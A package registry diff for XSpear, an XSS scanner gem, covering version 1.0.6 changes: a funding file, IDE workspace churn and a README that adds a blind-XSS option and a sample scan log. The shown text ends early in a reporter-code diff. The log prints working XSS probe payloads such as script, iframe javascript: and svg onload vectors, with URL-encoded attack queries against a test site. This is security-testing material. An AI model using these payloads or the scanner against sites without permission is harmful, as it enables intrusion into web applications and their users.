XSpear 1.0.5 → 1.0.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (8) hide show
  1. checksums.yaml +4 -4
  2. data/.github/FUNDING.yml +12 -0
  3. data/.idea/workspace.xml +116 -54
  4. data/README.md +75 -63
  5. data/lib/XSpear/XSpearRepoter.rb +9 -8
  6. data/lib/XSpear/version.rb +1 -1
  7. data/lib/XSpear.rb +88 -22
  8. metadata +3 -2
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: b09dcb74e1734799658762e143a9faf16db70df6200de80ca2334cdbfc8c5d08
4
- data.tar.gz: dd840605d1fd1261b672f5bf27de9f648a924abeb685f6bea2334a4f2f3f3cc1
3
+ metadata.gz: 79c560a49f42b36d468188a502f3b8c16f78b2b0c8a11af550deeb083978529e
4
+ data.tar.gz: d64291c47fddcee3d326ad2cb1db999c52fd992e3baf954b1b6fcdd47137f773
5
5
  SHA512:
6
- metadata.gz: c29c155ff0ab0667c2ff4deab4618eaace8dae3410e159b141187f1cd13040679b6f84597ff250fe3e99ee740e8676dbaeccc7df405f6ccf19026441f9a928cb
7
- data.tar.gz: 568f793d58fa31180fa494aefa54557b2e927ee3c240a5fb789502bd1c43730c24f22849eb2ac6110daccb97a882f845a69b1aea723848b3561eb46a9e03d7af
6
+ metadata.gz: 3af5242c09f427957569d96ab94f239f774471594d127e4f33ca3c92db2ef1787cf59adbad739c18944340635dbe6f3b5cb10261d2d9e144379505e5356a85b5
7
+ data.tar.gz: 4b2d8e9715b15fe2637d20655837e084d59dafbda2472ecc31a135dd8d3ee3469742c8d81cd8c372c323038d5ec07d70dafca7fb3bf2f5da4b1e758513e13256
data/.github/FUNDING.yml ADDED
@@ -0,0 +1,12 @@
1
+ # These are supported funding model platforms
2
+
3
+ github: #hahwul
4
+ patreon: # Replace with a single Patreon username
5
+ open_collective: # Replace with a single Open Collective username
6
+ ko_fi: # Replace with a single Ko-fi username
7
+ tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
8
+ community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
9
+ liberapay: # Replace with a single Liberapay username
10
+ issuehunt: # Replace with a single IssueHunt username
11
+ otechie: # Replace with a single Otechie username
12
+ custom: ['https://www.paypal.me/hahwul']
data/.idea/workspace.xml CHANGED
@@ -3,10 +3,7 @@
3
3
  <component name="ChangeListManager">
4
4
  <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
5
5
  <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
6
- <change beforePath="$PROJECT_DIR$/exe/XSpear" beforeDir="false" afterPath="$PROJECT_DIR$/exe/XSpear" afterDir="false" />
7
6
  <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
8
- <change beforePath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" afterDir="false" />
9
- <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
10
7
  </list>
11
8
  <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
12
9
  <option name="SHOW_DIALOG" value="false" />
@@ -22,7 +19,7 @@
22
19
  <file pinned="false" current-in-tab="false">
23
20
  <entry file="file://$PROJECT_DIR$/exe/XSpear">
24
21
  <provider selected="true" editor-type-id="text-editor">
25
- <state relative-caret-position="496">
22
+ <state relative-caret-position="525">
26
23
  <caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
27
24
  </state>
28
25
  </provider>
@@ -32,19 +29,19 @@
32
29
  <entry file="file://$PROJECT_DIR$/README.md">
33
30
  <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
34
31
  <state split_layout="SPLIT">
35
- <first_editor relative-caret-position="45">
36
- <caret line="3" column="132" selection-start-line="3" selection-start-column="132" selection-end-line="3" selection-end-column="132" />
32
+ <first_editor relative-caret-position="599">
33
+ <caret line="268" column="110" selection-start-line="268" selection-start-column="110" selection-end-line="268" selection-end-column="110" />
37
34
  </first_editor>
38
35
  <second_editor />
39
36
  </state>
40
37
  </provider>
41
38
  </entry>
42
39
  </file>
43
- <file pinned="false" current-in-tab="false">
40
+ <file pinned="false" current-in-tab="true">
44
41
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
45
42
  <provider selected="true" editor-type-id="text-editor">
46
- <state relative-caret-position="528">
47
- <caret line="309" column="94" lean-forward="true" selection-start-line="309" selection-start-column="94" selection-end-line="309" selection-end-column="94" />
43
+ <state relative-caret-position="370">
44
+ <caret line="376" lean-forward="true" selection-start-line="376" selection-end-line="376" />
48
45
  </state>
49
46
  </provider>
50
47
  </entry>
@@ -52,8 +49,8 @@
52
49
  <file pinned="false" current-in-tab="false">
53
50
  <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
54
51
  <provider selected="true" editor-type-id="text-editor">
55
- <state relative-caret-position="586">
56
- <caret line="107" column="36" lean-forward="true" selection-start-line="107" selection-start-column="36" selection-end-line="107" selection-end-column="36" />
52
+ <state relative-caret-position="392">
53
+ <caret line="102" column="9" lean-forward="true" selection-start-line="102" selection-start-column="9" selection-end-line="102" selection-end-column="9" />
57
54
  </state>
58
55
  </provider>
59
56
  </entry>
@@ -71,12 +68,12 @@
71
68
  <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
72
69
  <provider selected="true" editor-type-id="text-editor">
73
70
  <state relative-caret-position="195">
74
- <caret line="13" column="19" lean-forward="true" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
71
+ <caret line="13" column="19" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
75
72
  </state>
76
73
  </provider>
77
74
  </entry>
78
75
  </file>
79
- <file pinned="false" current-in-tab="true">
76
+ <file pinned="false" current-in-tab="false">
80
77
  <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
81
78
  <provider selected="true" editor-type-id="text-editor">
82
79
  <state relative-caret-position="15">
@@ -114,12 +111,12 @@
114
111
  <list>
115
112
  <option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
116
113
  <option value="$PROJECT_DIR$/XSpear.gemspec" />
117
- <option value="$PROJECT_DIR$/README.md" />
118
114
  <option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
119
115
  <option value="$PROJECT_DIR$/exe/XSpear" />
116
+ <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
117
+ <option value="$PROJECT_DIR$/README.md" />
120
118
  <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
121
119
  <option value="$PROJECT_DIR$/lib/XSpear.rb" />
122
- <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
123
120
  </list>
124
121
  </option>
125
122
  </component>
@@ -137,6 +134,7 @@
137
134
  <foldersAlwaysOnTop value="true" />
138
135
  </navigator>
139
136
  <panes>
137
+ <pane id="Scope" />
140
138
  <pane id="ProjectPane">
141
139
  <subPane>
142
140
  <expand>
@@ -174,7 +172,6 @@
174
172
  <select />
175
173
  </subPane>
176
174
  </pane>
177
- <pane id="Scope" />
178
175
  </panes>
179
176
  </component>
180
177
  <component name="PropertiesComponent">
@@ -233,7 +230,8 @@
233
230
  <updated>1562942814778</updated>
234
231
  <workItem from="1562942816004" duration="15337000" />
235
232
  <workItem from="1563638656518" duration="4985000" />
236
- <workItem from="1563809961097" duration="3592000" />
233
+ <workItem from="1563809961097" duration="4237000" />
234
+ <workItem from="1563893538891" duration="2230000" />
237
235
  </task>
238
236
  <task id="LOCAL-00001" summary="init update">
239
237
  <created>1562945899597</created>
@@ -424,17 +422,73 @@
424
422
  <option name="project" value="LOCAL" />
425
423
  <updated>1563649975625</updated>
426
424
  </task>
427
- <option name="localTasksCounter" value="28" />
425
+ <task id="LOCAL-00028" summary="(1.0.5) Add blind XSS options &amp; edit &quot;filtered Rule testing code&quot;">
426
+ <created>1563813695850</created>
427
+ <option name="number" value="00028" />
428
+ <option name="presentableId" value="LOCAL-00028" />
429
+ <option name="project" value="LOCAL" />
430
+ <updated>1563813695850</updated>
431
+ </task>
432
+ <task id="LOCAL-00029" summary="(1.0.5) Update README.md">
433
+ <created>1563814201784</created>
434
+ <option name="number" value="00029" />
435
+ <option name="presentableId" value="LOCAL-00029" />
436
+ <option name="project" value="LOCAL" />
437
+ <updated>1563814201784</updated>
438
+ </task>
439
+ <task id="LOCAL-00030" summary="(1.0.6)[fixed #6] Edit Static Analysis code">
440
+ <created>1563893769120</created>
441
+ <option name="number" value="00030" />
442
+ <option name="presentableId" value="LOCAL-00030" />
443
+ <option name="project" value="LOCAL" />
444
+ <updated>1563893769120</updated>
445
+ </task>
446
+ <task id="LOCAL-00031" summary="(1.0.6)[fixed #7] CallbackNotAdded 쪽 분기문 수정">
447
+ <created>1563893901111</created>
448
+ <option name="number" value="00031" />
449
+ <option name="presentableId" value="LOCAL-00031" />
450
+ <option name="project" value="LOCAL" />
451
+ <updated>1563893901111</updated>
452
+ </task>
453
+ <task id="LOCAL-00032" summary="(1.0.6)[fixed #4] Report 객체 수정">
454
+ <created>1563894048747</created>
455
+ <option name="number" value="00032" />
456
+ <option name="presentableId" value="LOCAL-00032" />
457
+ <option name="project" value="LOCAL" />
458
+ <updated>1563894048747</updated>
459
+ </task>
460
+ <task id="LOCAL-00033" summary="(1.0.6)[fixed #8] Added response header analysis module">
461
+ <created>1563894186608</created>
462
+ <option name="number" value="00033" />
463
+ <option name="presentableId" value="LOCAL-00033" />
464
+ <option name="project" value="LOCAL" />
465
+ <updated>1563894186608</updated>
466
+ </task>
467
+ <task id="LOCAL-00034" summary="(1.0.6)[fixed #9] Added method in report-cli">
468
+ <created>1563894430592</created>
469
+ <option name="number" value="00034" />
470
+ <option name="presentableId" value="LOCAL-00034" />
471
+ <option name="project" value="LOCAL" />
472
+ <updated>1563894430592</updated>
473
+ </task>
474
+ <task id="LOCAL-00035" summary="(1.0.6) Edit report &amp; scanning format">
475
+ <created>1563895638242</created>
476
+ <option name="number" value="00035" />
477
+ <option name="presentableId" value="LOCAL-00035" />
478
+ <option name="project" value="LOCAL" />
479
+ <updated>1563895638242</updated>
480
+ </task>
481
+ <option name="localTasksCounter" value="36" />
428
482
  <servers />
429
483
  </component>
430
484
  <component name="TimeTrackingManager">
431
- <option name="totallyTimeSpent" value="23914000" />
485
+ <option name="totallyTimeSpent" value="26789000" />
432
486
  </component>
433
487
  <component name="ToolWindowManager">
434
- <frame x="-1920" y="-620" width="1920" height="1057" extended-state="6" />
488
+ <frame x="-1920" y="-620" width="1920" height="1057" extended-state="0" />
435
489
  <editor active="true" />
436
490
  <layout>
437
- <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.16240682" />
491
+ <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.16400427" />
438
492
  <window_info id="Structure" order="1" side_tool="true" weight="0.25" />
439
493
  <window_info id="Favorites" order="2" side_tool="true" />
440
494
  <window_info anchor="bottom" id="Message" order="0" />
@@ -477,7 +531,15 @@
477
531
  <MESSAGE value="Edit version , release 1.0.2" />
478
532
  <MESSAGE value="Add EventHandler Test logic (1.0.3), edit description on report" />
479
533
  <MESSAGE value="verbose가 1일 떄 배너 출력되지 않도록 수정" />
480
- <option name="LAST_COMMIT_MESSAGE" value="verbose가 1 배너 출력되지 않도록 수정" />
534
+ <MESSAGE value="(1.0.5) Add blind XSS options &amp; edit &quot;filtered Rule testing code&quot;" />
535
+ <MESSAGE value="(1.0.5) Update README.md" />
536
+ <MESSAGE value="(1.0.6)[fixed #6] Edit Static Analysis code" />
537
+ <MESSAGE value="(1.0.6)[fixed #7] CallbackNotAdded 쪽 분기문 수정" />
538
+ <MESSAGE value="(1.0.6)[fixed #4] Report 객체 수정" />
539
+ <MESSAGE value="(1.0.6)[fixed #8] Added response header analysis module" />
540
+ <MESSAGE value="(1.0.6)[fixed #9] Added method in report-cli" />
541
+ <MESSAGE value="(1.0.6) Edit report &amp; scanning format" />
542
+ <option name="LAST_COMMIT_MESSAGE" value="(1.0.6) Edit report &amp; scanning format" />
481
543
  </component>
482
544
  <component name="editorHistoryManager">
483
545
  <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -493,13 +555,10 @@
493
555
  <entry file="file://$PROJECT_DIR$/bin/setup">
494
556
  <provider selected="true" editor-type-id="text-editor" />
495
557
  </entry>
496
- <entry file="file://$PROJECT_DIR$/README.md">
497
- <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
498
- <state split_layout="SPLIT">
499
- <first_editor relative-caret-position="45">
500
- <caret line="3" column="132" selection-start-line="3" selection-start-column="132" selection-end-line="3" selection-end-column="132" />
501
- </first_editor>
502
- <second_editor />
558
+ <entry file="file://$PROJECT_DIR$/exe/XSpear">
559
+ <provider selected="true" editor-type-id="text-editor">
560
+ <state relative-caret-position="525">
561
+ <caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
503
562
  </state>
504
563
  </provider>
505
564
  </entry>
@@ -510,51 +569,54 @@
510
569
  </state>
511
570
  </provider>
512
571
  </entry>
513
- <entry file="file://$PROJECT_DIR$/Rakefile">
514
- <provider selected="true" editor-type-id="text-editor" />
515
- </entry>
516
- <entry file="file:///usr/local/bin/rake">
517
- <provider selected="true" editor-type-id="text-editor" />
518
- </entry>
519
- <entry file="file://$PROJECT_DIR$/exe/XSpear">
572
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
520
573
  <provider selected="true" editor-type-id="text-editor">
521
- <state relative-caret-position="496">
522
- <caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
574
+ <state relative-caret-position="195">
575
+ <caret line="13" column="19" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
523
576
  </state>
524
577
  </provider>
525
578
  </entry>
526
- <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
579
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
527
580
  <provider selected="true" editor-type-id="text-editor">
528
- <state relative-caret-position="195">
529
- <caret line="13" column="19" lean-forward="true" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
581
+ <state relative-caret-position="15">
582
+ <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
530
583
  </state>
531
584
  </provider>
532
585
  </entry>
533
- <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
586
+ <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
534
587
  <provider selected="true" editor-type-id="text-editor">
535
- <state relative-caret-position="586">
536
- <caret line="107" column="36" lean-forward="true" selection-start-line="107" selection-start-column="36" selection-end-line="107" selection-end-column="36" />
588
+ <state relative-caret-position="105">
589
+ <caret line="7" column="23" selection-start-line="7" selection-start-column="23" selection-end-line="7" selection-end-column="38" />
537
590
  </state>
538
591
  </provider>
539
592
  </entry>
540
- <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
541
- <provider selected="true" editor-type-id="text-editor">
542
- <state relative-caret-position="528">
543
- <caret line="309" column="94" lean-forward="true" selection-start-line="309" selection-start-column="94" selection-end-line="309" selection-end-column="94" />
593
+ <entry file="file://$PROJECT_DIR$/Rakefile">
594
+ <provider selected="true" editor-type-id="text-editor" />
595
+ </entry>
596
+ <entry file="file:///usr/local/bin/rake">
597
+ <provider selected="true" editor-type-id="text-editor" />
598
+ </entry>
599
+ <entry file="file://$PROJECT_DIR$/README.md">
600
+ <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
601
+ <state split_layout="SPLIT">
602
+ <first_editor relative-caret-position="599">
603
+ <caret line="268" column="110" selection-start-line="268" selection-start-column="110" selection-end-line="268" selection-end-column="110" />
604
+ </first_editor>
605
+ <second_editor />
544
606
  </state>
545
607
  </provider>
546
608
  </entry>
547
- <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
609
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
548
610
  <provider selected="true" editor-type-id="text-editor">
549
- <state relative-caret-position="105">
550
- <caret line="7" column="23" selection-start-line="7" selection-start-column="23" selection-end-line="7" selection-end-column="38" />
611
+ <state relative-caret-position="392">
612
+ <caret line="102" column="9" lean-forward="true" selection-start-line="102" selection-start-column="9" selection-end-line="102" selection-end-column="9" />
551
613
  </state>
552
614
  </provider>
553
615
  </entry>
554
- <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
616
+ <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
555
617
  <provider selected="true" editor-type-id="text-editor">
556
- <state relative-caret-position="15">
557
- <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
618
+ <state relative-caret-position="370">
619
+ <caret line="376" lean-forward="true" selection-start-line="376" selection-end-line="376" />
558
620
  </state>
559
621
  </provider>
560
622
  </entry>
data/README.md CHANGED
@@ -6,12 +6,16 @@ XSpear is XSS Scanner on ruby gems
6
6
  ## Key features
7
7
  - Pattern matching based XSS scanning
8
8
  - Detect `alert` `confirm` `prompt` event on headless browser (with Selenium)
9
- - Testing request/response for XSS protection bypass and reflected params
9
+ - Testing request/response for XSS protection bypass and reflected params<br>
10
+ + Reflected Params
11
+ + Filtered test `event handler` `HTML tag` `Special Char`
12
+ - Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)
10
13
  - XSpear running on ruby code(with Gem library)
11
14
  - Dynamic/Static Analysis(Find SQL Error, etc..)
12
15
  - Show table base report and testing raw query(url)
13
16
  - Testing at selected parameters
14
17
  - Support output format `cli` `json`
18
+ + cli: summary, filtered rule(params), Raw Query
15
19
  - Support Verbose level (quit / nomal / raw data)
16
20
  - Support custom callback code to any test various attack vectors
17
21
 
@@ -58,6 +62,9 @@ $ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
58
62
  --headers=HEADERS [optional] Add HTTP Headers
59
63
  --cookie=COOKIE [optional] Add Cookie
60
64
  -p, --param=PARAM [optional] Test paramters
65
+ -b, --BLIND=URL [optional] Add vector of Blind XSS
66
+ + with XSS Hunter, ezXSS, HBXSS, etc...
67
+ + e.g : -b https://hahwul.xss.ht
61
68
  -t, --threads=NUMBER [optional] thread , default: 10
62
69
  -o, --output=FILENAME [optional] Save JSON Result
63
70
  -v, --verbose=1~3 [optional] Show log depth
@@ -102,65 +109,70 @@ etc...
102
109
  ### Sample log
103
110
  **Scanning XSS**
104
111
  ```
105
- $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=1"
106
- ) (
107
- ( /( )\ )
108
- )\())(()/( ( ) (
109
- ((_)\ /(_))` ) ))\ ( /( )(
110
- __((_)(_)) /(/( /((_))(_))(()\
111
- \ \/ // __|((_)_\ (_)) ((_)_ ((_)
112
- > < \__ \| '_ \)/ -_)/ _` || '_|
113
- /_/\_\|___/| .__/ \___|\__,_||_| />
114
- |_| \ /<
115
- {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
116
- / \<
117
- \>
118
- [*] creating a test query.
119
- [*] test query generation is complete. [30 query]
120
- [*] starting test and analysis. [10 threads]
121
- [-] [01:24:38] not reflected XsPeaR`
122
- [-] [01:24:38] not reflected XsPeaR>
123
- [I] [01:24:38] reflected rEfe6[param: cat][reflected parameter]
124
- [-] [01:24:38] not reflected XsPeaR|
125
- [-] [01:24:38] not reflected XsPeaR'
126
- [I] [01:24:38] [param: cat][Found SQL Error Pattern]
127
- [-] [01:24:38] not reflected XsPeaR(
128
- [-] [01:24:38] not reflected <XsPeaR
129
- [-] [01:24:38] not reflected XsPeaR"
130
- [-] [01:24:38] not reflected XsPeaR;
131
- [-] [01:24:39] not reflected XsPeaR:
132
- [-] [01:24:39] not reflected XsPeaR[
133
- [-] [01:24:39] not reflected XsPeaR]
134
- [-] [01:24:39] not reflected XsPeaR}
135
- [-] [01:24:39] not reflected XsPeaR)
136
- [-] [01:24:39] not reflected XsPeaR{
137
- [-] [01:24:39] not reflected XsPeaR.
138
- [-] [01:24:39] not reflected XsPeaR-
139
- [-] [01:24:39] not reflected XsPeaR+
140
- [-] [01:24:39] not reflected XsPeaR,
141
- [I] [01:24:40] reflected XsPeaR$[param: cat][not filtered $]
142
- [-] [01:24:40] not reflected <svg/onload=alert(45)>
143
- [H] [01:24:40] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
144
- [-] [01:24:40] not reflected XsPeaR=
145
- [-] [01:24:40] not reflected <img/src onerror=alert(45)>
146
- [*] finish scan. the report is being generated..
147
- +----+------+------------------+-------+----------------------------+-------------------------+
148
- | [ XSpear report ] |
149
- | http://testphp.vulnweb.com/listproducts.php?cat=1 |
150
- | 2019-07-20 01:24:38 +0900 ~ 2019-07-20 01:25:41 +0900 Found 4 issues. |
151
- +----+------+------------------+-------+----------------------------+-------------------------+
152
- | NO | TYPE | ISSUE | PARAM | PAYLOAD | DESCRIPTION |
153
- +----+------+------------------+-------+----------------------------+-------------------------+
154
- | 0 | INFO | REFLECTED | cat | rEfe6 | reflected parameter |
155
- | 1 | INFO | DYNAMIC ANALYSIS | cat | XsPeaR" | Found SQL Error Pattern |
156
- | 2 | INFO | FILERD RULE | cat | XsPeaR$ | not filtered $ |
157
- | 3 | HIGH | XSS | cat | <script>alert(45)</script> | reflected XSS Code |
158
- +----+------+------------------+-------+----------------------------+-------------------------+
159
- < Raw Query >
160
- [0] http://testphp.vulnweb.com/listproducts.php?cat=1?cat=1rEfe6
161
- [1] http://testphp.vulnweb.com/listproducts.php?cat=1?cat=1XsPeaR%22
162
- [2] http://testphp.vulnweb.com/listproducts.php?cat=1?cat=1XsPeaR%24
163
- [3] http://testphp.vulnweb.com/listproducts.php?cat=1?cat=1%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
112
+ $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z"
113
+ ) (
114
+ ( /( )\ )
115
+ )\())(()/( ( ) (
116
+ ((_)\ /(_))` ) ))\ ( /( )(
117
+ __((_)(_)) /(/( /((_))(_))(()\
118
+ \ \/ // __|((_)_\ (_)) ((_)_ ((_)
119
+ > < \__ \| '_ \)/ -_)/ _` || '_|
120
+ /_/\_\|___/| .__/ \___|\__,_||_| />
121
+ |_| \ /<
122
+ {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
123
+ / \<
124
+ \> [ v1.0.5 ]
125
+ [*] creating a test query.
126
+ [*] test query generation is complete. [138 query]
127
+ [*] starting test and analysis. [10 threads]
128
+ [I] [01:44:06] [param: cat][Found SQL Error Pattern]
129
+ [I] [01:44:06] reflected rEfe6[param: cat][reflected parameter]
130
+ [I] [01:44:08] reflected onhwul=64[param: cat][not filtered event handler on{any} pattern]
131
+ [-] [01:44:14] not reflected <svg/onload=alert(45)>
132
+ [H] [01:44:14] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
133
+ [H] [01:44:15] reflected "><iframe/src=JavaScriPt:alert(45)>[param: cat][reflected XSS Code]
134
+ [-] [01:44:15] not reflected <img/src onerror=alert(45)>
135
+ [-] [01:44:20] not found alert/prompt/confirm event '"><svg/onload=alert(45)>
136
+ =>
137
+ [-] [01:44:21] not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>">
138
+ =>
139
+ [V] [01:44:21] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script>
140
+ => [param: cat][triggered <script>alert(45)</script>]
141
+ [-] [01:44:22] not found alert/prompt/confirm event '"><svg/onload=alert(45)>
142
+ =>
143
+ [V] [01:44:22] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>
144
+ => [param: cat][triggered <svg/onload=alert(45)>]
145
+ [-] [01:44:23] not found alert/prompt/confirm event '"><svg/onload=alert(45)>
146
+ =>
147
+ [*] finish scan. the report is being generated..
148
+ +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
149
+ | [ XSpear report ] |
150
+ | http://testphp.vulnweb.com/listproducts.php?cat=z |
151
+ | 2019-07-23 01:44:05 +0900 ~ 2019-07-23 01:44:23 +0900 Found 7 issues. |
152
+ +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
153
+ | NO | TYPE | ISSUE | PARAM | PAYLOAD | DESCRIPTION |
154
+ +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
155
+ | 0 | INFO | DYNAMIC ANALYSIS | cat | XsPeaR" | Found SQL Error Pattern |
156
+ | 1 | INFO | REFLECTED | cat | rEfe6 | reflected parameter |
157
+ | 2 | INFO | FILERD RULE | cat | onhwul=64 | not filtered event handler on{any} pattern |
158
+ | 3 | HIGH | XSS | cat | <script>alert(45)</script> | reflected XSS Code |
159
+ | 4 | HIGH | XSS | cat | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code |
160
+ | 5 | VULN | XSS | cat | <script>alert(45)</script> | triggered <script>alert(45)</script> |
161
+ | 6 | VULN | XSS | cat | '"><svg/onload=alert(45)> | triggered <svg/onload=alert(45)> |
162
+ +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
163
+ < Not Filtered >
164
+ [cat] param
165
+ + Special Char: `,\,<,|,(,;,>,',),+,-,{,.,],,,[,},:,=,$
166
+ + Event Handler: "onAfterUpdate","onAbort","onBeforeCut","onAfterPrint","onBeforeActivate","onActivate","onBeforeCopy","onBeforeUpdate","onBeforeEditFocus","onBeforeDeactivate","onBlur","onBounce","onCellChange","onBegin","onBeforePrint","onBeforeUnload","onBeforePaste","onCut","onContextMenu","onCopy","onDataSetComplete","onClick","onDblClick","onControlSelect","onDataSetChanged","onChange","onDataAvailable","onDragEnd","onDragOver","onDrag","onDragLeave","onDragStart","onDeactivate","onDragEnter","onDragDrop","onDrop","onEnd","onFinish","onHashChange","onFocusIn","onErrorUpdate","onHelp","onFocusOut","onInput","onFocus","onError","onFilterChange","onMouseDown","onKeyPress","onMediaComplete","onLayoutComplete","onMediaError","onKeyUp","onMessage","onKeyDown","onLoad","onLoseCapture","onMouseEnter","onMouseUp","onMouseLeave","onMove","onMoveEnd","onMoveStart","onMouseOver","onMouseMove","onMouseOut","onMouseWheel","onProgress","onOutOfSync","onPopState","onPropertyChange","onOffline","onOnline","onRedo","onPaste","onReadyStateChange","onPause","onResizeStart","onRowExit","onResume","onRowDelete","onRepeat","onReset","onResizeEnd","onReverse","onRowsEnter","onResize","onSelectionChange","onSyncRestored","onStart","onStop","onStorage","onRowInserted","onSelect","onSelectStart","onScroll","onSeek","onTrackChange","onUnload","onURLFlip","onSubmit","onTimeError","onUndo"
167
+ + HTML Tag: "script","iframe"
168
+ < Raw Query >
169
+ [0] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zXsPeaR%22
170
+ [1] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zrEfe6
171
+ [2] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%5C%22%3E%3Cxspear+onhwul%3D64%3E
172
+ [3] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
173
+ [4] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert%2845%29%3E
174
+ [5] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
175
+ [6] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%27%22%3E%3Csvg%2Fonload%3Dalert%2845%29%3E
164
176
  ```
165
177
 
166
178
  **to JSON**
@@ -173,8 +185,8 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
173
185
  ```ruby
174
186
  require 'XSPear'
175
187
 
176
- s = XspearScan.new "https://www.hahwul.com?target_url", "post_body=thisisbodydata", "CustomHeader: wow", 3, 10, "result.json", "3"
177
- # s = XspearScan.new options.url, options.data, options.headers, options.level, options.thread.to_i, options.output, options.verbose
188
+ s = XspearScan.new "https://www.hahwul.com?target_url", "post_body=thisisbodydata", "CustomHeader: wow", 3, 10, "result.json", "3", "blind-xss-url"
189
+ # s = XspearScan.new options.url, options.data, options.headers, options.level, options.thread.to_i, options.output, options.verbose, options.blind
178
190
  s.run
179
191
  ```
180
192
 
@@ -254,5 +266,5 @@ The gem is available as open source under the terms of the [MIT License](https:/
254
266
  Everyone interacting in the XSpear project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://github.com/[USERNAME]/XSpear/blob/master/CODE_OF_CONDUCT.md).
255
267
 
256
268
  ## ScreenShot
257
- <img src="https://user-images.githubusercontent.com/13212227/61582619-ed233700-ab67-11e9-94f7-33cb6af5997c.png" width=100%>
269
+ <img src="https://user-images.githubusercontent.com/13212227/61649243-14a30c80-acec-11e9-9a20-73839c4ec580.png" width=100%>
258
270
  <img src="https://user-images.githubusercontent.com/13212227/61311071-8b459300-a830-11e9-8e60-c08e984fdacb.png" width=100%>
data/lib/XSpear/XSpearRepoter.rb CHANGED
@@ -13,13 +13,14 @@ class IssueStruct
13
13
  end
14
14
 
15
15
  class XspearRepoter
16
- def initialize(url,starttime)
